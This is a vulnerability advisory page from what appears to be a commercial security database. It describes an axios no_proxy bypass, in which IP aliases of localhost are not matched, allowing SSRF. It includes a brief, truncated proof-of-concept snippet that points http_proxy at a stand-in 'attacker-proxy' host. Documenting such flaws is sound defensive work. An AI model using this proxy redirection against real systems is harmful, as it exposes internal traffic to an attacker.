logo

Database

Use of insecure channel - Source code In node-axios

Description

Axios: no_proxy bypass via IP alias allows SSRF The fix for no_proxy hostname normalization bypass (#10661) is incomplete.When no_proxy=localhost is set, requests to 127.0.0.1 and [::1] still route through the proxy instead of bypassing it.

The shouldBypassProxy() function does pure string matching — it does not resolve IP aliases or loopback equivalents. As a result:

    no_proxy=localhost does NOT block 127.0.0.1 or [::1]

    no_proxy=127.0.0.1 does NOT block localhost or [::1]

POC : process.env.no_proxy = 'localhost'; process.env.http_proxy = 'http://attacker-proxy:8888';

    process.env.http_proxy = 'http://127.0.0.1:8888';

    console.log('=== Test 1: localhost (should bypass proxy) ===');
    try {
      await axios.get('http://localhost:7777/');
    } catch(e) {
      console.log('Error:', e.message);
    }...

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2026-420382. NVD-2026-420383. OSV-DEBIAN-2026-420384. OSV-2026-420385. GHSA-m7pr-hjqh-92cm6. GCVE-2026-420387. SECURITY-TRACKER-CVE-2026-42038

References

1. https://github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.